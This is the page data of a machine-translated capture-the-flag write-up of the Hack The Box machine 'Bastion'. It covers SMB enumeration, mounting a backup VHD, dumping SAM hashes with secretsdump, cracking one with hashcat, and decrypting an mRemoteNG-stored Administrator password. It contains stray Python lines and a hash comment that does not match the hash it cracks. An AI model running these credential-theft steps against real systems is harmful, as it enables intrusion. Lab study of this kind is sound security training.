{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-windows-bastion-en","result":{"data":{"markdownRemark":{"id":"7e155cad-343c-5007-9b76-92cd6b190882","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-windows-bastion\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy current rank on Hack The Box is ProHacker at the time of writing.</p>\n<span class=\"gatsby-resp-image-wrapper\" style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 220px; \">\n      <a class=\"gatsby-resp-image-link\" href=\"/static/b46c3deeba8d74f48e014674ce163828/c8042/327080.png\" style=\"display: block\" target=\"_blank\" rel=\"noopener\">\n    <span class=\"gatsby-resp-image-background-image\" style=\"padding-bottom: 22.727272727272727%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAABXUlEQVQY0zWPPU/bUBSG/S+6d4GFCmJCk/he4xvbIbbyoZDUJkEJRAkfQhRaAgMBwufGRIeqE2JEYmXgJ/Cr7tObVgyvjvRK5znPsa7GI05PDvTl+JBkLSVeTak0U+rJOs1Oj87mkLiRIPwyqlzl63KAimo4foQMY0QQkZVFbMfTJlgvTxf69fme97dHricjBns/GJ2esfP9J/tHJ1zc3NEb7qCqq7S6fXMwodnuMtzeYq3XpzvYJueFUyCLwtfW5KbGw6+x/vP7lrvJMbVkk/X+rrGpI4MKaXcLFVZZrHXIBA0WvIrpi4w2BMJbJgxc5vMKuyD1fM7Gqqef9WA/4vxsg0G/hd9yqLQVpZYgaheI24KgIXBKLqVveWTsmuUiS1IZI2XeNWaOz0LBJkg+aWsuM2OKWe16S2SFpBCK/wkkzopErExhklzRRZbNVFOgMXI+4v0DZ/JSf8na/AV+WMC/qpzpOQAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"></span>\n  <picture>\n          <source srcset=\"/static/b46c3deeba8d74f48e014674ce163828/b5458/327080.webp 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/webp\">\n          <source srcset=\"/static/b46c3deeba8d74f48e014674ce163828/c8042/327080.png 220w\" sizes=\"(max-width: 220px) 100vw, 220px\" type=\"image/png\">\n          <img class=\"gatsby-resp-image-image\" src=\"/static/b46c3deeba8d74f48e014674ce163828/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\" loading=\"lazy\" style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\">\n        </picture>\n  </a>\n    </span>\n<p>This is a writeup for the HackTheBox retired machine “Bastion.”</p>\n<!-- omit in toc -->\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to promote any actions that violate social order.</strong></p>\n<p>Please note in advance that attempting to attack environments you do not own or have not been authorized to access may violate the ‘Act on Prohibition of Unauthorized Computer Access’ (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#about-this-article\">About This Article</a></li>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li><a href=\"#analyzing-the-vhd-file\">Analyzing the VHD File</a></li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>Starting with the usual reliable port scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span>IPをHOSTSに追加して高速スキャン\n$ <span class=\"token function\">sudo</span> <span class=\"token function\">sed</span> -i <span class=\"token string\">'s/^[0-9].*$RHOST/10.10.10.134 $RHOST/g'</span> /etc/hosts\n$ nmap -sV -sC -Pn -T4 <span class=\"token variable\">$RHOST</span><span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap1.txt\n\n<span class=\"token comment\"># All ports</span>\n$ nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt</code></pre></div>\n<p>Quite a few things appear to be open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">PORT    STATE SERVICE      VERSION\n<span class=\"token number\">22</span>/tcp  <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>          OpenSSH for_Windows_7.9 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">93</span>:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">135</span>/tcp <span class=\"token function\">open</span>  msrpc        Microsoft Windows RPC\n<span class=\"token number\">139</span>/tcp <span class=\"token function\">open</span>  netbios-ssn  Microsoft Windows netbios-ssn\n<span class=\"token number\">445</span>/tcp <span class=\"token function\">open</span>  microsoft-ds Windows Server <span class=\"token number\">2016</span> Standard <span class=\"token number\">14393</span> microsoft-ds\nService Info: OSs: Windows, Windows Server <span class=\"token number\">2008</span> R2 - <span class=\"token number\">2012</span><span class=\"token punctuation\">;</span> CPE: cpe:/o:microsoft:windows\n\nHost script results:\n<span class=\"token operator\">|</span> smb-security-mode: \n<span class=\"token operator\">|</span>   account_used: guest\n<span class=\"token operator\">|</span>   authentication_level: user\n<span class=\"token operator\">|</span>   challenge_response: supported\n<span class=\"token operator\">|</span>_  message_signing: disabled <span class=\"token punctuation\">(</span>dangerous, but default<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> smb2-security-mode: \n<span class=\"token operator\">|</span>   <span class=\"token number\">3.1</span>.1: \n<span class=\"token operator\">|</span>_    Message signing enabled but not required\n<span class=\"token operator\">|</span> smb2-time: \n<span class=\"token operator\">|</span>   date: <span class=\"token number\">2022</span>-08-14T07:08:23\n<span class=\"token operator\">|</span>_  start_date: <span class=\"token number\">2022</span>-08-14T07:05:13\n<span class=\"token operator\">|</span> smb-os-discovery: \n<span class=\"token operator\">|</span>   OS: Windows Server <span class=\"token number\">2016</span> Standard <span class=\"token number\">14393</span> <span class=\"token punctuation\">(</span>Windows Server <span class=\"token number\">2016</span> Standard <span class=\"token number\">6.3</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   Computer name: Bastion\n<span class=\"token operator\">|</span>   NetBIOS computer name: BASTION<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>   Workgroup: WORKGROUP<span class=\"token punctuation\">\\</span>x00\n<span class=\"token operator\">|</span>_  System time: <span class=\"token number\">2022</span>-08-14T09:08:24+02:00\n<span class=\"token operator\">|</span>_clock-skew: mean: -39m57s, deviation: 1h09m13s, median: 0s</code></pre></div>\n<p>Let’s start by enumerating SMB.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ enum4linux <span class=\"token variable\">$RHOST</span>\n<span class=\"token operator\">></span> 特に何も見つからず\n\n$ crackmapexec smb <span class=\"token variable\">$RHOST</span>\nSMB         <span class=\"token number\">10.10</span>.10.134    <span class=\"token number\">445</span>    BASTION          <span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Windows Server <span class=\"token number\">2016</span> Standard <span class=\"token number\">14393</span> x64 <span class=\"token punctuation\">(</span>name:BASTION<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>domain:Bastion<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>signing:False<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">(</span>SMBv1:True<span class=\"token punctuation\">)</span>\n\n$ smbmap -H <span class=\"token variable\">$RHOST</span> -d WORKGROUP -u guest</code></pre></div>\n<p>The smbmap results were as shown in the following image.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 903px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/c1df9318e09f0e87d8effcb24aa04ab0/c4b7c/image-20220814161720294.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 25.83333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAIAAADKYVtkAAAACXBIWXMAAAsTAAALEwEAmpwYAAAArUlEQVQY03VPWw6DIBDkUJRqLPJmeUVrU+P9b9JBP00nYVkyuzMDszHWZUu11eWda8mZWivH8d22BQ1RNNZIKYUQzxtYTlQK5RSDt85ZazD6Ct55b7VW6FHnWXbCaMB7h1upGRSbpsk5F0Pg/HEBJv2cVsMJNDAnCpAYxjHGoJTqzpxzbfS6NsyIP8AMMu37p2SCVkqEfQgxcFBFpMvzDjiAQvJSEiqeof/QIvkPuatI6O+AcVUAAAAASUVORK5CYII='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/c1df9318e09f0e87d8effcb24aa04ab0/8ac56/image-20220814161720294.webp 240w,\n/static/c1df9318e09f0e87d8effcb24aa04ab0/d3be9/image-20220814161720294.webp 480w,\n/static/c1df9318e09f0e87d8effcb24aa04ab0/4673f/image-20220814161720294.webp 903w\"\n              sizes=\"(max-width: 903px) 100vw, 903px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/c1df9318e09f0e87d8effcb24aa04ab0/8ff5a/image-20220814161720294.png 240w,\n/static/c1df9318e09f0e87d8effcb24aa04ab0/e85cb/image-20220814161720294.png 480w,\n/static/c1df9318e09f0e87d8effcb24aa04ab0/c4b7c/image-20220814161720294.png 903w\"\n            sizes=\"(max-width: 903px) 100vw, 903px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/c1df9318e09f0e87d8effcb24aa04ab0/c4b7c/image-20220814161720294.png\"\n            alt=\"image-20220814161720294\"\n            title=\"image-20220814161720294\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Since <code class=\"language-text\">smb2-security-mode</code> was 3.1.1, I thought SMBGhost might work, but the exploit did not function properly.</p>\n<p>Continuing the enumeration, I found that <code class=\"language-text\">NT LM 0.12 (SMBv1)</code> was running.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ nmap -p139,445 --script smb-protocols <span class=\"token number\">10.10</span>.10.134\nPORT    STATE SERVICE\n<span class=\"token number\">139</span>/tcp <span class=\"token function\">open</span>  netbios-ssn\n<span class=\"token number\">445</span>/tcp <span class=\"token function\">open</span>  microsoft-ds\n\nHost script results:\n<span class=\"token operator\">|</span> smb-protocols: \n<span class=\"token operator\">|</span>   dialects: \n<span class=\"token operator\">|</span>     NT LM <span class=\"token number\">0.12</span> <span class=\"token punctuation\">(</span>SMBv1<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>dangerous, but default<span class=\"token punctuation\">]</span>\n<span class=\"token operator\">|</span>     <span class=\"token number\">2.0</span>.2\n<span class=\"token operator\">|</span>     <span class=\"token number\">2.1</span>\n<span class=\"token operator\">|</span>     <span class=\"token number\">3.0</span>\n<span class=\"token operator\">|</span>     <span class=\"token number\">3.0</span>.2\n<span class=\"token operator\">|</span>_    <span class=\"token number\">3.1</span>.1</code></pre></div>\n<p>I tried EternalBlue, but got an SMB SessionError and it did not work.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">impacket.smb.SessionError: SMB SessionError: STATUS_ACCESS_DENIED<span class=\"token punctuation\">(</span><span class=\"token punctuation\">{</span>Access Denied<span class=\"token punctuation\">}</span> A process has requested access to an object but has not been granted those access rights.<span class=\"token punctuation\">)</span></code></pre></div>\n<p>Reviewing the enumeration results again, I noticed there was a share called ‘Backups’ in addition to the default shares.</p>\n<p>Connecting with smbclient as shown below, I was able to browse the shared files.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ smbclient -N <span class=\"token punctuation\">\\</span><span class=\"token punctuation\">\\</span><span class=\"token punctuation\">\\</span><span class=\"token punctuation\">\\</span><span class=\"token number\">10.10</span>.10.134<span class=\"token punctuation\">\\</span><span class=\"token punctuation\">\\</span>Backups    \nTry <span class=\"token string\">\"help\"</span> to get a list of possible commands.\nsmb: <span class=\"token punctuation\">\\</span><span class=\"token operator\">></span> <span class=\"token function\">dir</span>\n  <span class=\"token builtin class-name\">.</span>                                   D        <span class=\"token number\">0</span>  Sun Aug <span class=\"token number\">14</span> 01:34:58 <span class=\"token number\">2022</span>\n  <span class=\"token punctuation\">..</span>                                  D        <span class=\"token number\">0</span>  Sun Aug <span class=\"token number\">14</span> 01:34:58 <span class=\"token number\">2022</span>\n  GYGJLRPNZM                          D        <span class=\"token number\">0</span>  Sun Aug <span class=\"token number\">14</span> 00:16:02 <span class=\"token number\">2022</span>\n  NAZTUYVCIR                          D        <span class=\"token number\">0</span>  Sun Aug <span class=\"token number\">14</span> 01:34:58 <span class=\"token number\">2022</span>\n  note.txt                           AR      <span class=\"token number\">116</span>  Tue Apr <span class=\"token number\">16</span> 03:10:09 <span class=\"token number\">2019</span>\n  OYSNDCHGMR                          D        <span class=\"token number\">0</span>  Sun Aug <span class=\"token number\">14</span> 01:34:34 <span class=\"token number\">2022</span>\n  SDT65CB.tmp                         A        <span class=\"token number\">0</span>  Fri Feb <span class=\"token number\">22</span> 04:43:08 <span class=\"token number\">2019</span>\n  WindowsImageBackup                 Dn        <span class=\"token number\">0</span>  Fri Feb <span class=\"token number\">22</span> 04:44:02 <span class=\"token number\">2019</span>\n\n                <span class=\"token number\">5638911</span> blocks of size <span class=\"token number\">4096</span>. <span class=\"token number\">1175622</span> blocks available</code></pre></div>\n<p>Following the WindowsImageBackup directory tree, I found VHD files that appeared to be a machine backup.</p>\n<p>However, the default timeout was set to 20 seconds, making it impossible to download the large VHD file. Using the following command to increase the timeout sufficiently allowed me to download it.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token operator\">></span> <span class=\"token function\">timeout</span> <span class=\"token number\">200000</span></code></pre></div>\n<h2 id=\"analyzing-the-vhd-file\" style=\"position:relative;\"><a href=\"#analyzing-the-vhd-file\" aria-label=\"analyzing the vhd file permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Analyzing the VHD File</h2>\n<p>Downloading the larger VHD took several hours, but the intended solution appears to be remote mounting rather than downloading.</p>\n<p>Using qemu, you can mount the disk from Linux over SMB.</p>\n<p>os.environ[‘PYGAME<em>HIDE</em>SUPPORT_PROMPT’] = ‘hide’<a href=\"https://bethesignal.org/blog/2011/01/05/how-to-mount-virtualbox-vdi-image/\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">How to mount a VirtualBox VDI image | Be the signal</a></p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\"><span class=\"token function\">mkdir</span> /mnt/L4mpje-PC\n<span class=\"token function\">mkdir</span> /mnt/vhd\nmodprobe nbd\n<span class=\"token function\">mount</span> -t cifs //10.10.10.134/Backups/WindowsImageBackup/L4mpje-PC  /mnt/L4mpje-PC/\nqemu-nbd -r -c /dev/nbd0 <span class=\"token string\">\"/mnt/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd\"</span>\n<span class=\"token function\">mount</span> -r /dev/nbd0p1 /mnt/vhd</code></pre></div>\n<p>I explored the mounted VHD and obtained NTLM hashes.</p>\n<p>Further cracking the hash with hashcat allowed me to recover the user’s password.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token function\">docker</span> run --net <span class=\"token function\">host</span> --rm -it -v <span class=\"token variable\"><span class=\"token variable\">`</span><span class=\"token builtin class-name\">pwd</span><span class=\"token variable\">`</span></span>:/root impacket\n$ ./secretsdump.py -sam SAM -system SYSTEM\nsecretsdump.py -sam SAM -system SYSTEM LOCAL\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f\n<span class=\"token punctuation\">[</span>*<span class=\"token punctuation\">]</span> Dumping <span class=\"token builtin class-name\">local</span> SAM hashes <span class=\"token punctuation\">(</span>uid:rid:lmhash:nthash<span class=\"token punctuation\">)</span>\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\n\n<span class=\"token comment\"># Crack(NTLM is 31d6cfe0d16ae931b73c59d7e0c089c0)</span>\n$ hashcat -a <span class=\"token number\">0</span> -m <span class=\"token number\">1000</span> ./ntlm /usr/share/wordlists/rockyou.txt\n26112010952d963c8dc4217daec986d9:bureaulampje</code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 504px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/131e962484717c0d4af8df5cb915bd7b/08115/image-20220814215754775.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 64.99999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAIAAAAmMtkJAAAACXBIWXMAAAsTAAALEwEAmpwYAAABrUlEQVQoz22SZ3LcMAyFdavMZFWoyiYWrdpuJuPE97+EP4q2sz+CoSgWPODhgYWUk7XGORuCY6GVHMfRWM05a2O01nKeuTHpM1qIpv6ywljz63kexxqjX9e4bYu1ljkGP7v58di50lqNwzCkr2+aF3DXdQE/a5RSxLZWQ4HtOA4k9z4lhVBdV7eyrKqqfrGibdsUeIIskXuCT9OkJNMImKGU1CpZ24r/gJVOvvj1fdf3/XRhiCWlVOoTr6QEDOCbNv8CiZyjOhtjIPMSPbCft5sPSBDKy26XXayr1+QFFR7Htu3reW4Qv+SReKKy95bweKMLEcnfdS3sqP8TDE/qoWwGxBAsywZnMPVFkgWkaAeZlnvM/BMYhlVZZXr8GiHIud4DvRWtyC2Ql36cBJ/AbKm0FSIJlruSFWbQzzQPcOq/BcdyR7gSjWialLwg0nnu52N/Pg8W3s3EsrNNHTLazjwqlV6Bzq8gvUVyZtVSzbnDhMQPSZKeadRf2uaDKveJ6v6pLa3zd57lzrAhGu9HM1OZdp5tXDe3LHFbtXNv739//3n7UdaV6CvRlU33AcCQ1gbjheDWAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/131e962484717c0d4af8df5cb915bd7b/8ac56/image-20220814215754775.webp 240w,\n/static/131e962484717c0d4af8df5cb915bd7b/d3be9/image-20220814215754775.webp 480w,\n/static/131e962484717c0d4af8df5cb915bd7b/062aa/image-20220814215754775.webp 504w\"\n              sizes=\"(max-width: 504px) 100vw, 504px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/131e962484717c0d4af8df5cb915bd7b/8ff5a/image-20220814215754775.png 240w,\n/static/131e962484717c0d4af8df5cb915bd7b/e85cb/image-20220814215754775.png 480w,\n/static/131e962484717c0d4af8df5cb915bd7b/08115/image-20220814215754775.png 504w\"\n            sizes=\"(max-width: 504px) 100vw, 504px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/131e962484717c0d4af8df5cb915bd7b/08115/image-20220814215754775.png\"\n            alt=\"image-20220814215754775\"\n            title=\"image-20220814215754775\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"privilege-escalation\" style=\"position:relative;\"><a href=\"#privilege-escalation\" aria-label=\"privilege escalation permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Privilege Escalation</h2>\n<p>I tried running systeminfo to look for vulnerabilities, but it seems I don’t have sufficient privileges.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ C:<span class=\"token punctuation\">\\</span>Users<span class=\"token punctuation\">\\</span>L4mpje<span class=\"token operator\">></span>systeminfo                                       \nERROR: Access denied  </code></pre></div>\n<p>Continuing the enumeration, I found the Administrator’s RDP password embedded in the configuration file of an application called mRemoteNG.</p>\n<div class=\"gatsby-highlight\" data-language=\"xml\"><pre class=\"language-xml\"><code class=\"language-xml\"><span class=\"token prolog\">&lt;?xml version=\"1.0\" encoding=\"utf-8\"?></span>\n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;</span><span class=\"token namespace\">mrng:</span>Connections</span> <span class=\"token attr-name\"><span class=\"token namespace\">xmlns:</span>mrng</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>http://mremoteng.org<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">Name</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>Connections<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">Export</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>false<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">EncryptionEngine</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>AES<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">BlockCipherMode</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>GC                         \nM<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">KdfIterations</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>1000<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">FullFileEncryption</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>false<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">Protected</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0                         \noop8R8ddXKAx4KK7sAk6AA<span class=\"token punctuation\">\"</span></span> <span class=\"token attr-name\">ConfVersion</span><span class=\"token attr-value\"><span class=\"token punctuation attr-equals\">=</span><span class=\"token punctuation\">\"</span>2.6<span class=\"token punctuation\">\"</span></span><span class=\"token punctuation\">></span></span>\n    &lt;Node Name=\"DC\" Type=\"Connection\" Descr=\"\" Icon=\"mRemoteNG\" Panel=\"General\" Id=\"500e7d58-662a-44d4-aff0-3a4f547a3fee\" Userna me=\"Administrator\" Domain=\"\" Password=\"aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==\" Hostname=\"127.0.0.1\" Protocol=\"RDP\" PuttySession=\"Default Settings\" Port=\"3389\" ConnectToConsole=\"false\" UseCredSsp=\"true\" Rend eringEngine=\"IE\" ICAEncryptionStrength=\"EncrBasic\"       \n<span class=\"token tag\"><span class=\"token tag\"><span class=\"token punctuation\">&lt;/</span><span class=\"token namespace\">mrng:</span>Connections</span><span class=\"token punctuation\">></span></span></code></pre></div>\n<p>This password is encrypted and Base64-encoded, but it can be decrypted using the following script.</p>\n<p>os.environ[‘PYGAME<em>HIDE</em>SUPPORT_PROMPT’] = ‘hide’<a href=\"https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">mremoteng-decrypt/mremoteng_decrypt.py at master · kmahyyg/mremoteng-decrypt · GitHub</a></p>\n<p>Using this password to connect via SSH, I was able to obtain a shell with Administrator privileges.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 602px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9abb27afaa501a1317258cd0be1efebe/32056/image-20220814231730643.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 48.33333333333333%; position: relative; bottom: 